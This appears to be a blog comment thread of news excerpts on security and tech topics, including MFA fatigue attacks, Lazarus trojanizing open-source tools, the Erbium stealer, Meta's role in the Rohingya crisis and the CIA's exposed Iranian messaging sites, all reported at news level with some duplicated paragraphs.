A hashquine is a fun way to show off your crypto-tricks — It’s a file that contains its own hash. In some file types it’s trivial, you just pick the hash to hit, and then put random data in a comment or other invisible field till you get a collision. A Python script that prints its own hash would be easy. But not every file type is so easy. Take PNG for instance. these files are split into chunks of data, and each chunk is both CRC-32 and adler32 checksummed. Make one change, and everything changes, in three places at once. Good luck finding that collision. So how exactly did [David Buchanan] generate that beautiful PNG, which does in fact md5sum to the value in the image? Very cleverly.
Tomi Engdahl says:
High-Profile Hacks Show Effectiveness of MFA Fatigue Attacks
https://www.securityweek.com/high-profile-hacks-show-effectiveness-mfa-fatigue-attacks
What are MFA fatigue attacks and how can they be prevented?
Recent high-profile cyberattacks have demonstrated the effectiveness of an interesting method for getting past multi-factor authentication (MFA).
MFA provides an extra layer of security for user accounts. If a threat actor can obtain an account’s username and password through phishing or other methods, MFA should prevent them from accessing the account.
There are several types of MFA and attackers can use various methods to bypass this security layer. They can exploit MFA bypass vulnerabilities, use social engineering to trick the target into providing the one-time password, deploy phishing pages that harvest not only the username and password but also the MFA code, they can use malware that collects MFA codes, or hijack the victim’s phone number via SIM swapping to receive the codes meant for the target.
In recent months, there appears to have been an increase in attacks that rely on a method known as ‘MFA fatigue’ and ‘MFA push notification spam’.
This method targets MFA that relies on push notifications, where the user gets a push notification on their mobile device asking them to approve a login attempt after their username and password have been entered.
SMS-based multi-factor authentication has been proven to be insecure and many online services providers have replaced it with more secure alternatives. One of them is push notifications, which are displayed to the user either by the app associated with the service they want to access, or by a dedicated third-party app that works with multiple services.
While users would likely not approve the login if they only got one suspicious push notification, many users would and do approve them if they’re inundated with notifications.
Continuously getting MFA push notifications might lead the user to believe that there is a glitch and approving the request could put an end to the spamming. The victim could also approve the request accidentally. As soon as they hit the ‘Yes, it’s me’ button, the attacker can log into their account and perform malicious actions.
This method was leveraged in the recent attacks targeting Cisco and Uber. In the attack on Uber, the attacker increased their chances of success by combining it with social engineering. They contacted the victim on WhatsApp, claiming to be a member of the IT team and instructing them to approve the login to get the MFA notifications to stop.
Uber linked the attack to individuals associated with the Lapsus$ group, which over the past year targeted companies such as NVIDIA, Okta, Globant, Samsung, Vodafone, Ubisoft and Microsoft. A suspect was arrested in the United Kingdom shortly after the incident came to light.
Microsoft also reported seeing the Lapsus$ group use MFA fatigue, but it’s unclear if the method was also used in the attack aimed at the tech giant.
Tomi Engdahl says:
Report Shows How Long It Takes Ethical Hackers to Execute Attacks
https://www.securityweek.com/report-shows-how-long-it-takes-ethical-hackers-execute-attacks
A survey of more than 300 ethical hackers conducted by cybersecurity companies Bishop Fox and SANS Institute found that many could execute an end-to-end attack in less than a day.
The respondents were mostly from the United States, but they represented organizations that have operations around the world. A vast majority of them have been conducting ethical hacking for 10 years or less. Their experience includes being a member of an organization’s internal security team, offensive security firm consulting, bug bounty hunting, and independent hacking-for-hire.
The goal of the survey is to gain insight into how attackers think, how fast they are, and the tools they use, as well as to obtain information that could be useful to defenders looking to improve their security posture and refine their defensive and offensive strategies.
Nearly 40% of the surveyed ethical hackers said they can break into an environment more often than not, if not always.
When asked about how long it takes them to discover an exploitable vulnerability that gives them access to a targeted organization’s environment (perimeter breach), roughly 40% of respondents indicated that it takes them five hours or less, and nearly 5% believe they can do it in less than an hour.
Know Your Enemy, Know Yourself: Examining the Mind of a Cyber Attacker
https://bishopfox.com/blog/examine-cyber-attacker-minds
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”
Sun Tzu’s simple concept can be applied to virtually any type of confrontation: know yourself and know your enemy. The degree of knowledge on both fronts predicts the outcome regardless of the type of confrontation. Forensic psychology investigates the motives and minds of criminals and can predict what would otherwise be unknown about criminal behavior. Interestingly, cybersecurity can follow a similar path to defend forward in any organization but often doesn’t.
Know yourself. The best cybersecurity teams go through painstaking measures to know themselves. They implement attack surface discovery, asset inventory, data classification, vulnerability scanning – the list goes on and on – and many security teams have a good sense of themselves. Defensive decisions are made based on risk in relation to business impact and investments are made accordingly.
Know your enemy. While knowing yourself is challenging, knowing your enemy is nearly impossible in cybersecurity. In a perfect world, you would be able to interrogate cybercriminals who are caught to better understand how they choose targets and select techniques. We invest in the science of forensic psychology for a reason – communicating with criminals teaches us what led to the reasons behind committing crimes.
Tomi Engdahl says:
Barbara Ortutay / Associated Press:
Amnesty International: Meta’s algorithms “proactively amplified and promoted content” on Facebook that incited violent hatred against the Rohingya in Myanmar
Rohingya seek reparations from Facebook for role in massacre
https://apnews.com/article/technology-business-bangladesh-myanmar-c5af9acec46a3042beed7f5e1bc71b8a
With roosters crowing in the background as he speaks from the crowded refugee camp in Bangladesh that’s been his home since 2017, Maung Sawyeddollah, 21, describes what happened when violent hate speech and disinformation targeting the Rohingya minority in Myanmar began to spread on Facebook.
“We were good with most of the people there. But some very narrow minded and very nationalist types escalated hate against Rohingya on Facebook,” he said. “And the people who were good, in close communication with Rohingya. changed their mind against Rohingya and it turned to hate.”
For years, Facebook, now called Meta Platforms Inc., pushed the narrative that it was a neutral platform in Myanmar that was misused by malicious people, and that despite its efforts to remove violent and hateful material, it unfortunately fell short. That narrative echoes its response to the role it has played in other conflicts around the world, whether the 2020 election in the U.S. or hate speech in India.
FILE – A car passes Facebook’s new Meta logo on a sign at the company headquarters on Oct. 28, 2021, in Menlo Park, Calif. For years, Facebook, now called Meta, has pushed a narrative that it was a neutral platform in Myanmar that was misused by bad actors and failed to moderate violent and hateful material adequately. But a new report by Amnesty International says Facebook was not merely a passive site with insufficient content moderation. Rather, Meta’s algorithms “proactively amplified” material that incited violent hatred against the Rohingya beginning as early as 2012. (AP Photo/Tony Avelar, File)
FILE – A car passes Facebook’s new Meta logo on a sign at the company headquarters on Oct. 28, 2021, in Menlo Park, Calif. For years, Facebook, now called Meta, has pushed a narrative that it was a neutral platform in Myanmar that was misused by bad actors and failed to moderate violent and hateful material adequately. But a new report by Amnesty International says Facebook was not merely a passive site with insufficient content moderation. Rather, Meta’s algorithms “proactively amplified” material that incited violent hatred against the Rohingya beginning as early as 2012. (AP Photo/Tony Avelar, File)
With roosters crowing in the background as he speaks from the crowded refugee camp in Bangladesh that’s been his home since 2017, Maung Sawyeddollah, 21, describes what happened when violent hate speech and disinformation targeting the Rohingya minority in Myanmar began to spread on Facebook.
“We were good with most of the people there. But some very narrow minded and very nationalist types escalated hate against Rohingya on Facebook,” he said. “And the people who were good, in close communication with Rohingya. changed their mind against Rohingya and it turned to hate.”
For years, Facebook, now called Meta Platforms Inc., pushed the narrative that it was a neutral platform in Myanmar that was misused by malicious people, and that despite its efforts to remove violent and hateful material, it unfortunately fell short. That narrative echoes its response to the role it has played in other conflicts around the world, whether the 2020 election in the U.S. or hate speech in India.
ADVERTISEMENT
But a new and comprehensive report by Amnesty International states that Facebook’s preferred narrative is false. The platform, Amnesty says, wasn’t merely a passive site with insufficient content moderation. Instead, Meta’s algorithms “proactively amplified and promoted content” on Facebook, which incited violent hatred against the Rohingya beginning as early as 2012.
Despite years of warnings, Amnesty found, the company not only failed to remove violent hate speech and disinformation against the Rohingya, it actively spread and amplified it until it culminated in the 2017 massacre. The timing coincided with the rising popularity of Facebook in Myanmar, where for many people it served as their only connection to the online world. That effectively made Facebook the internet for a vast number of Myanmar’s population.
“Meta — through its dangerous algorithms and its relentless pursuit of profit — substantially contributed to the serious human rights violations perpetrated against the Rohingya,” the report says.
Like Sawyeddollah, who is quoted in the Amnesty report and spoke with the AP on Tuesday, most of the people who fled Myanmar — about 80% of the Rohingya living in Myanmar’s western state of Rakhine at the time — are still staying in refugee camps. And they are asking Meta to pay reparations for its role in the violent repression of Rohingya Muslims in Myanmar, which the U.S. declared a genocide earlier this year.
It notes that digital rights activists say Meta has improved its civil society engagement and some aspects of its content moderation practices in Myanmar in recent years. In January 2021, after a violent coup overthrew the government, it banned the country’s military from its platform.
But critics, including some of Facebook’s own employees, have long maintained such an approach will never truly work. It means Meta is playing whack-a-mole trying to remove harmful material while its algorithms designed to push “engaging” content that’s more likely to get people riled up essentially work against it.
FILE – A car passes Facebook’s new Meta logo on a sign at the company headquarters on Oct. 28, 2021, in Menlo Park, Calif. For years, Facebook, now called Meta, has pushed a narrative that it was a neutral platform in Myanmar that was misused by bad actors and failed to moderate violent and hateful material adequately. But a new report by Amnesty International says Facebook was not merely a passive site with insufficient content moderation. Rather, Meta’s algorithms “proactively amplified” material that incited violent hatred against the Rohingya beginning as early as 2012. (AP Photo/Tony Avelar, File)
FILE – A car passes Facebook’s new Meta logo on a sign at the company headquarters on Oct. 28, 2021, in Menlo Park, Calif. For years, Facebook, now called Meta, has pushed a narrative that it was a neutral platform in Myanmar that was misused by bad actors and failed to moderate violent and hateful material adequately. But a new report by Amnesty International says Facebook was not merely a passive site with insufficient content moderation. Rather, Meta’s algorithms “proactively amplified” material that incited violent hatred against the Rohingya beginning as early as 2012. (AP Photo/Tony Avelar, File)
With roosters crowing in the background as he speaks from the crowded refugee camp in Bangladesh that’s been his home since 2017, Maung Sawyeddollah, 21, describes what happened when violent hate speech and disinformation targeting the Rohingya minority in Myanmar began to spread on Facebook.
“We were good with most of the people there. But some very narrow minded and very nationalist types escalated hate against Rohingya on Facebook,” he said. “And the people who were good, in close communication with Rohingya. changed their mind against Rohingya and it turned to hate.”
For years, Facebook, now called Meta Platforms Inc., pushed the narrative that it was a neutral platform in Myanmar that was misused by malicious people, and that despite its efforts to remove violent and hateful material, it unfortunately fell short. That narrative echoes its response to the role it has played in other conflicts around the world, whether the 2020 election in the U.S. or hate speech in India.
ADVERTISEMENT
But a new and comprehensive report by Amnesty International states that Facebook’s preferred narrative is false. The platform, Amnesty says, wasn’t merely a passive site with insufficient content moderation. Instead, Meta’s algorithms “proactively amplified and promoted content” on Facebook, which incited violent hatred against the Rohingya beginning as early as 2012.
Technology
Australia flags tough new data protection laws this year
Meta disables Russian propaganda network targeting Europe
Attorneys for Musk, Twitter argue over information exchange
Senators push to reform police’s cellphone tracking tools
Despite years of warnings, Amnesty found, the company not only failed to remove violent hate speech and disinformation against the Rohingya, it actively spread and amplified it until it culminated in the 2017 massacre. The timing coincided with the rising popularity of Facebook in Myanmar, where for many people it served as their only connection to the online world. That effectively made Facebook the internet for a vast number of Myanmar’s population.
More than 700,000 Rohingya fled into neighboring Bangladesh that year. Myanmar security forces were accused of mass rapes, killings and torching thousands of homes owned by Rohingya.
“Meta — through its dangerous algorithms and its relentless pursuit of profit — substantially contributed to the serious human rights violations perpetrated against the Rohingya,” the report says.
A spokesperson for Meta declined to answer questions about the Amnesty report. In a statement, the company said it “stands in solidarity with the international community and supports efforts to hold the Tatmadaw accountable for its crimes against the Rohingya people.”
ADVERTISEMENT
“Our safety and integrity work in Myanmar remains guided by feedback from local civil society organizations and international institutions, including the U.N. Fact-Finding Mission on Myanmar; the Human Rights Impact Assessment we commissioned in 2018; as well as our ongoing human rights risk management,” Rafael Frankel, director of public policy for emerging markets, Meta Asia-Pacific, said in a statement.
Like Sawyeddollah, who is quoted in the Amnesty report and spoke with the AP on Tuesday, most of the people who fled Myanmar — about 80% of the Rohingya living in Myanmar’s western state of Rakhine at the time — are still staying in refugee camps. And they are asking Meta to pay reparations for its role in the violent repression of Rohingya Muslims in Myanmar, which the U.S. declared a genocide earlier this year.
ADVERTISEMENT
Amnesty’s report, out Wednesday, is based on interviews with Rohingya refugees, former Meta staff, academics, activists and others. It also relied on documents disclosed to Congress last year by whistleblower Frances Haugen, a former Facebook data scientist. It notes that digital rights activists say Meta has improved its civil society engagement and some aspects of its content moderation practices in Myanmar in recent years. In January 2021, after a violent coup overthrew the government, it banned the country’s military from its platform.
But critics, including some of Facebook’s own employees, have long maintained such an approach will never truly work. It means Meta is playing whack-a-mole trying to remove harmful material while its algorithms designed to push “engaging” content that’s more likely to get people riled up essentially work against it.
ADVERTISEMENT
“These algorithms are really dangerous to our human rights. And what happened to the Rohingya and Facebook’s role in that specific conflict risks happening again, in many different contexts across the world,” said Pat de Brún, researcher and adviser on artificial intelligence and human rights at Amnesty.
“The company has shown itself completely unwilling or incapable of resolving the root causes of its human rights impact.”
In 2020, for instance, three years after the violence in Myanmar killed thousands of Rohingya Muslims and displaced 700,000 more, Facebook investigated how a video by a leading anti-Rohingya hate figure, U Wirathu, was circulating on its site.
The probe revealed that over 70% of the video’s views came from “chaining” — that is, it was suggested to people who played a different video, showing what’s “up next.” Facebook users were not seeking out or searching for the video, but had it fed to them by the platform’s algorithms.
Wirathu had been banned from Facebook since 2018.
“Even a well-resourced approach to content moderation, in isolation, would likely not have sufficed to prevent and mitigate these algorithmic harms. This is because content moderation fails to address the root cause of Meta’s algorithmic amplification of harmful content,” Amnesty’s report says.
“We believe that the genocide against Rohingya was possible only because of Facebook,” Sawyeddollah said. “They communicated with each other to spread hate, they organized campaigns through Facebook. But Facebook was silent.”
Tomi Engdahl says:
Newley Purnell / Wall Street Journal:
Audio: Meta executives told rights groups that a decision “at the highest levels” prevented a detailed report on hate speech in India “for security reasons”
Meta Officials Cite Security Concerns for Failing to Release Full India Hate-Speech Study
https://www.wsj.com/articles/meta-officials-cite-security-concerns-for-failing-to-release-details-of-india-hate-speech-study-11664370857?mod=djemalertNEWS
Executives at the Facebook parent privately shared with rights groups their disappointment about the sparse report, according to audio recordings
Executives at Meta Platforms Inc. META 5.36% privately told rights groups that security concerns prevented them from releasing details of its investigation into hate speech on its services in India, according to audio recordings heard by The Wall Street Journal.
Meta, the parent company of Facebook, in July released a four-page summary of a human-rights impact assessment on India, its biggest market by users, where it has faced accusations of failing to adequately police hate speech against religious minorities. The India summary was part of the company’s first global human-rights report. The 83-page global report offers detailed findings of some previous investigations; it included only general descriptions of its India assessment, which disappointed some rights advocates.
“This is not the report that the human-rights team at Meta wanted to publish, we wanted to be able to publish more,” Iain Levine, a Meta senior human-rights adviser, said during private online briefings with rights groups in late July after the summary was released, according to the recordings.
“A decision was made at the highest levels of the company based upon both internal and external advice that it was not possible to do so for security reasons,” he said.
Tomi Engdahl says:
Foo Yun Chee / Reuters:
The European Commission proposes the AI Liability Directive, seeking to make it easier to sue the makers of drones, robots, and other AI-based products
EU proposes rules making it easier to sue drone makers, AI systems
https://www.reuters.com/technology/eu-proposes-rules-making-it-easier-sue-drone-makers-ai-systems-2022-09-28/
BRUSSELS, Sept 28 (Reuters) – The European Commission on Wednesday proposed rules making it easier for individuals and companies to sue makers of drones, robots and other products equipped with artificial intelligence software for compensation for harm caused by them.
The AI Liability Directive aims to address the increasing use of AI-enabled products and services and the patchwork of national rules across the 27-country European Union.
Under the draft rules, victims can seek compensation for harm to their life, property, health and privacy due to the fault or omission of a provider, developer or user of AI technology, or for discrimination in a recruitment process using AI.
“We want the same level of protection for victims of damage caused by AI as for victims of old technologies,” Justice Commissioner Didier Reynders told a news conference.
Tomi Engdahl says:
Umar Shakir / The Verge:
Cloudflare releases Turnstile, a “privacy-preserving” CAPTCHA alternative that tests the browser, not the user, through JavaScript-based challenges, in beta
Turnstile is Cloudflare’s latest attempt to rid the web of CAPTCHAs
https://www.theverge.com/2022/9/28/23367035/cloudflare-turnstile-captcha-bot-blocker-beta?scrolla=5eb6d68b7fedc32c19ef33b4
/ If you’re tired of clicking on picture grids to identify traffic lights and bicycles, this approach might help change that
Cloudflare is testing a new kind of CAPTCHA that tests your browser instead of you. The company calls it Turnstile, and it’s designed to spare us from performing those mundane click-the-traffic-light kinds of tasks to verify you’re a human and not a bot.
Turnstile is being presented as “a user-friendly, privacy preserving alternative” to CAPTCHA. According to a press release, it will get rid of the interactive challenges used to verify people, which Cloudflare says normally take an average of 32 seconds to pass, and reduce the entire process to one second.
Instead of presenting a visual puzzle to a user, Turnstile applies one of many browser challenges that it rotates through to look for human behavior, amping up the difficulty if a visitor exhibits “non-human behaviors.” Turnstile uses JavaScript-based challenges that read the web browser environment for signals that indicate there’s a person entering the site, cycling through tests like proof of work, proof of space, and probing for web APIs. It also utilizes machine learning models to compare previously successful challenges with new ones, speeding up the passing process
An interaction-free test that reduces confirmation time to one second
Announcing Turnstile, a user-friendly, privacy-preserving alternative to CAPTCHA
https://blog.cloudflare.com/turnstile-private-captcha-alternative/
Today, we’re announcing the open beta of Turnstile, an invisible alternative to CAPTCHA. Anyone, anywhere on the Internet, who wants to replace CAPTCHA on their site will be able to call a simple API, without having to be a Cloudflare customer or sending traffic through the Cloudflare global network. Sign up here for free.
There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. The creator of the CAPTCHA has even publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We hate it, you hate it, everyone hates it. Today we’re giving everyone a better option.
Tomi Engdahl says:
Microsoft: Lazarus hackers are weaponizing open-source software https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/
Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment.. The list of open-source software weaponized by Lazarus state hackers to deploy the BLINDINGCAN (aka ZetaNile) backdoor includes PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer.. The PuTTY and KiTTY SSH clients were also used to backdoor targets devices in fake job skills assessments, as reported by Mandiant this month.
Tomi Engdahl says:
Erbium stealer on the hunt for data
https://www.malwarebytes.com/blog/news/2022/09/increasingly-popular-erbium-stealer-on-the-hunt-for-data
Theres a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims..
Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.. A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.. Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication
(2FA) data. Connections are made to Discords Content Delivery Network in order to potentially download more malware.. According to the latest research available, it leans into that well worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.
Tomi Engdahl says:
New Royal Ransomware emerges in multi-million dollar attacks https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/
A ransomware operation named Royal is quickly ramping up, targeting corporations with ransom demands ranging from $250,000 to over $2 million.. Royal is an operation that launched in January 2022 and consists of a group of vetted and experienced ransomware actors from previous operations.. Unlike most active ransomware operations, Royal does not operate as a Ransomware-as-a-Service but is instead a private group without affiliates.
Tomi Engdahl says:
Finnish intelligence warns Russia highly likely to turn to cyber in winter https://therecord.media/finnish-intelligence-warns-russia-highly-likely-to-turn-to-cyber-in-winter/
The head of the Finnish Security Intelligence Service (Suojelupoliisi or SUPO) says it is highly likely that Russia will turn to the cyber environment over the winter for espionage due to challenges impacting its human intelligence work.. In the unclassified National Security Overview 2022 published on Thursday, SUPO said that Russias traditional intelligence gathering approach using spies with diplomatic cover has become substantially more difficult since Russia launched its war of aggression in Ukraine, as many Russian diplomats have been expelled from the West.. The agency acknowledged that there are still some active intelligence officers working inside the country, but said the Finnish government has probably severed the connection to their Russian networks, at least for the time being, and little information is available through the usual channels.
Tomi Engdahl says:
Kansainvälinen tietoliikenne on merikaapeleiden varassa – näin kävisi, jos Suomen kaapelit katkaistaisiin
Jos Suomen merikaapeliyhteydet katkaistaisiin pankkiliikenne tyssäisi ja internet ei toimisi.
https://www.iltalehti.fi/kotimaa/a/1409fff6-863d-4d84-ad7d-1671a4a5ec7c
Kansainvälinen viestiliikenne on merikaapeleiden varassa.
Kaapelit vaurioituvat muutenkin, mutta myös sabotaasin uhka on mahdollinen.
Jos Suomen kaapelit katkaistaisiin, internetin käyttö ja pankkiliikenne tyssäisivät.
Kansainvälinen tietoliikenne on merenpohjalla kulkevien merikaapeleiden varassa. Käytännössä verkosto mahdollistaa yli 90 prosenttia kansainvälisestä viestintäliikenteestä. Kaapelit ovat kuitenkin alttiita salakuuntelulle ja sabotaasille. Merikaapeleiden merkittävä vaurioittaminen aiheuttaisi viestintäliikenteen katkeamisen, joka vaikuttaisi yksityisten ihmisten, yritysten, julkisten organisaatioiden ja esimerkiksi pankkien toimintaan.
Laaja ja joustava verkosto
Suomesta lähtee kymmenkunta kaapelia kohti Pohjoismaita ja Saksaa. Nämä yhdistyvät laajaan merikaapeleiden verkostoon, joka mahdollistaa globaalin viestinnän. Merikaapelijärjestelmä on joustava ja viestiliikennettä voidaan ohjata kulkemaan eri reittejä.
– Tietoliikenteessä verkottumisen takia emme esimerkiksi tiedä, mitä reittejä informaatiovirrat kulkevat, kun käytämme hakukonetta, sanoo kyberturvallisuuden työelämäprofessori Martti Lehto Jyväskylän yliopistosta.
Myös vaurioita korjattaessa liikenne ohjataan toista kaapelia pitkin ilman, että esimerkiksi internetin käyttäjä huomaa toiminnassa minkäänlaista ongelmaa.
Tavanomaisten kalastusalusten ja maanjäristysten aiheuttamien vaurioiden lisäksi on mahdollista, että kaapeleille aiheutettaisiin tahallista vahinkoa. Kaapelin vahingoittaminen on kansainvälisen oikeuden vastaista, mutta aluevesien ulkopuolella valvonnan toteuttaminen on haastavaa.
Tomi Engdahl says:
Multi-Cloud Networks Require Cloud-Native Protection
https://www.securityweek.com/multi-cloud-networks-require-cloud-native-protection
By integrating with native security services on major cloud platforms, a CNP solution can correlate security findings to pinpoint risks and recommend mitigations
Solution sprawl is one of the biggest challenges facing security teams. Rapid digital transformation has led to nearly 60% of organizations having 30 or more security tools deployed across their organization, according to IBM’s Cyber Resilient Organization Study 2021. Almost a third have more than 50. And worse, this logistical nightmare sits atop an aggressive digital acceleration strategy spurred by the pandemic. It has already pushed many overtaxed security teams to the breaking point.
Compounding the problem, rapid cloud adoption, multi-cloud strategies, and diverse cloud workloads are further increasing security complexity and friction. Ironically, the shift to the cloud that was supposed to simplify things like remote access to applications and provide dynamic scale has actually led to even further security complexity. The first issue is that many of the security solutions in use on-premises may simply not be available in cloud platforms. And even when cloud versions are available, they often operate differently, increasing overhead while reducing configuration and policy enforcement consistency. And if those tools aren’t also cloud-native, even more friction results because integration requires cooperation across multiple stakeholders, including IT teams, application developers, DevOps engineers, and more.
It’s one of the reasons why, according to Gartner, 80% of organizations are at some stage of vendor and solution consolidation. Because while protecting cloud workloads is essential, undue complexity can impact their ability to detect and respond to threats, especially when events lack context from the cloud control plane. Furthermore, separate tools can generate hundreds of alerts that must be hunted down by hand to understand their scope and context, leading to alert fatigue and inaccurate prioritization. As a result, cloud threats can accumulate faster than they can be resolved.
Tomi Engdahl says:
Kaiji Botnet Successor ‘Chaos’ Targeting Linux, Windows Systems
https://www.securityweek.com/kaiji-botnet-successor-chaos-targeting-linux-windows-systems
Black Lotus Labs, Lumen Technologies’ threat intelligence team, has issued a warning on Chaos, the new variant of the Kaiji distributed denial-of-service (DDoS) botnet, targeting enterprises and large organizations.
Believed to be of Chinese origin, the Golang-based Kaiji malware emerged in early 2020, targeting Linux systems and internet of things (IoT) devices via SSH brute force attacks. By mid-2020, the threat was also targeting Docker servers.
The same as Kaiji, the recently observed Chaos malware is written in Go and uses SSH brute force attacks to infect new devices. Additionally, it also targets known vulnerabilities and uses stolen SSH keys for infection.
The threat works on multiple architectures, including ARM, Intel (i386), MIPS and PowerPC, and can run on both Linux and Windows, Black Lotus Labs says.
Once it has infected a device, Chaos establishes persistence and connects to an embedded command and control (C&C) server. Next, it receives staging commands, such as to start propagation via known CVEs or SSH, or to begin IP spoofing.
Tomi Engdahl says:
North Korean Gov Hackers Caught Rigging Legit Software
https://www.securityweek.com/north-korean-gov-hackers-caught-rigging-legit-software
Threat hunters at Microsoft have intercepted a notorious North Korean government hacking group lacing legitimate open source software with custom malware capable of data theft, espionage, financial gain and network destruction.
The hackers, a sub-group of Lazarus that Microsoft calls ZINC, are weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installers in a new wave of malware attacks.
Redmond described the attackers as a “highly operational, destructive, and sophisticated nation-state activity group” and warned that its LinkedIn networking portal was also being abused to trawl for targets.
In a report documenting the discovery, Microsoft said the hackers use LinkedIn to connect with and befriend employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.
“Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads,” Microsoft added.
ZINC weaponizing open-source software
https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
Tomi Engdahl says:
Investors Bet on Ox Security to Guard Software Supply Chains
https://www.securityweek.com/investors-bet-ox-security-guard-software-supply-chains
The funding frenzy in the software supply chain space now includes Ox Security, an early-stage Israeli startup that just raised a whopping $34 million in seed-stage financing.
Ox Security, based in Tel Aviv, announced Wednesday that the $34 million funding round was led by Evolution Equity Partners, Team8, and M12, Microsoft’s venture fund. Investors at Rain Capital also participated.
Tomi Engdahl says:
More Than Half of Security Pros Say Risks Higher in Cloud Than On Premise
https://www.securityweek.com/more-half-security-pros-say-risks-higher-cloud-premise
Report shows that forty-five percent of companies have had four or more cloud incidents in the last year
A recent survey from machine identity solutions provider Venafi aimed to explore the complexity of cloud environments and the resulting impact on cybersecurity
Venafi surveyed 1,101 security decision makers (SDMs) in firms with more than 1,000 employees and found that eighty-one percent of companies have experienced a cloud security incident in the last year. Forty-five percent have suffered at least four security incidents in the same period. More than half of security decision makers believe that security risks are higher in the cloud than on-premise.
Twenty-four percent of the firms have more than 10,000 employees. Ninety-two percent of the SDMs are at manager level or above, with 49% at c-suite level or higher.
Most of the firms surveyed believe the underlying issue is the increasing complexity of their cloud deployments. Since these companies already host 41% of their applications in the cloud, and expect to increase this to 57% over the next 18 months, the problem is only likely to worsen in the future.
Tomi Engdahl says:
Australia Flags Tough New Data Protection Laws This Year
https://www.securityweek.com/australia-flags-tough-new-data-protection-laws-year
Australia could have tough new data protection laws in place this year in an urgent response to a cyberattack that stole from a telecommunications company the personal data of 9.8 million customers, the attorney-general said Thursday.
Attorney-General Mark Dreyfus said the government would make “urgent reforms” to the Privacy Act following the unprecedented hack last week on Optus, Australia’s second-largest wireless carrier.
Dreyfus said “I think it’s possible” for the law to be changed in the four remaining weeks that Parliament is scheduled to sit this year.
“I’m going to be looking very hard over the next four weeks at whether or not we can get reforms to the Privacy Act into the Parliament before the end of the year,” Dreyfus told reporters. Parliament next sits on Oct. 25.
Tomi Engdahl says:
Reuters:
An investigation shows the CIA failed to secure its messaging system used by Iranian spies, often hidden within websites, leading to capture, torture, and death
America’s Throwaway Spies
How the CIA failed Iranian informants in its secret war with Tehran
https://www.reuters.com/investigates/special-report/usa-spies-iran/
“This is a very serious, very serious intelligence goal to penetrate Iran’s nuclear weapons program. You don’t get a much higher priority than that.”
James Lawler, a former CIA officer whose focus included weapons of mass destruction and Iran
The CIA considers Iran one of its most difficult targets. Ever since Iranian students seized the American embassy in Tehran in 1979, the United States has had no diplomatic presence in the country. CIA officers are instead forced to recruit potential agents outside Iran or through online connections. The thin local presence leaves U.S. intelligence at a disadvantage amid events such as the protests now sweeping Iran over the death of a woman arrested for violating the country’s religious dress code.
Four former intelligence officers interviewed by Reuters said the agency is willing to take bigger risks with sources when it comes to spying on Iran. Curbing the Islamic Republic’s nuclear ambitions has long been a priority in Washington. Tehran insists its nuclear efforts are solely for energy needs.
“This is a very serious, very serious intelligence goal to penetrate Iran’s nuclear weapons program. You don’t get a much higher priority than that,” said James Lawler, a former CIA officer whose focus included weapons of mass destruction and Iran. “So when they do the risk-versus-gain analysis, you’ve got to consider the incredible amount of gain.”
Reuters for the first time, gave an unprecedented firsthand account of the deadly spy game from the perspective of Iranians who served as CIA foot soldiers.
The six Iranians served prison terms ranging from five to 10 years. Four of them, including Hosseini, stayed in Iran after their release and remain vulnerable to rearrest. Two fled the country and have become stateless refugees.
The six men acknowledged that their CIA handlers never made firm promises to help if they were caught. Still, all had believed that U.S. assistance would one day come.
The espionage busts could pose a challenge to the CIA’s credibility as it seeks to rebuild its spy network in Iran. The country’s state media publicized some of these cases, portraying the agency as feckless and inept.
“It’s a stain on the U.S. government,” Hosseini told Reuters.
“CIA takes its obligations to protect the people that work with us very seriously and we know that many do so bravely at great personal risk,” Thorpe said. “The notion that CIA would not work as hard as possible to safeguard them is false.”
What Hosseini didn’t know was that the world’s most powerful intelligence agency had given him a tool that likely led to his capture. In 2018, Yahoo News reported that a flawed web-based covert communications system had led to the arrest and execution of dozens of CIA informants in Iran and China.
Reuters located the secret CIA communications site identified by Hosseini, Iraniangoals.com, in an internet archive where it remains publicly available. Reuters then asked two independent cyber analysts – Bill Marczak of University of Toronto’s Citizen Lab, and Zach Edwards of Victory Medium – to probe how Iran may have used weaknesses in the CIA’s own technology to unmask Hosseini and other CIA informants. The two are experts on privacy and cybersecurity, with experience analyzing electronic intelligence operations. The effort represents the first independent technical analysis of the intelligence failure.
Marczak and Edwards quickly discovered that the secret messaging window hidden inside Iraniangoals.com could be spotted by simply right-clicking on the page to bring up the website’s coding. This code contained descriptions of secret functions, including the words “message” and “compose” – easily found clues that a messaging capability had been built into the site. The coding for the search bar that triggered the secret messaging software was labeled “password.”
Far from being customized, high-end spycraft, Iraniangoals.com was one of hundreds of websites mass-produced by the CIA to give to its sources, the independent analysts concluded. These rudimentary sites were devoted to topics such as beauty, fitness and entertainment, among them a Star Wars fan page and another for the late American talk show host Johnny Carson.
